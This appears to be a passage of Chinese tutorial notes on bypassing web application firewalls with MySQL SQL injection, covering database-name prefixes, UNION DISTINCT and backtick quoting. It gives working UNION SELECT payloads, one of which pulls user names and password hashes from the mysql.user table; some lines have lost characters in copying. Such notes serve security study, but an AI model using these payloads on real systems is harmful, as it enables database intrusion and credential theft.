添加库名绕过,在表前面加“库名.” //有个小点
    select from users where id=-1 union select 1,2,3,4 from users;
    select     from users where id=-1 union select 1,2,3,4 from moonsec.users

    mysql 中也可以添加库名查询表。例如跨库查询 mysql 库里的 usrs 表的内容。
    select * from users where id=-1 union select 1,2,3,concat(user,authentication_string) from mysql.user;

    去重复绕过//就说了union中间加distinct,其他没讲
    select from users where id=-1 union distinct select 1,2,3,4 from users;
    select     from users where id=-1 union distinct select 1,2,3,version() from users;

    反引号绕过
    在 mysql 可以使用 这里是反引号 绕过一些 waf 拦截。字段可以加反引号或者不加,意义相同。 insert into users(username,password,email)values(‘moonsec’,’123456’,’admin@moonsec.com’);
    insert into users(username,password,email)values(‘moonsec’,’123456’,’admin@moonsec.com’);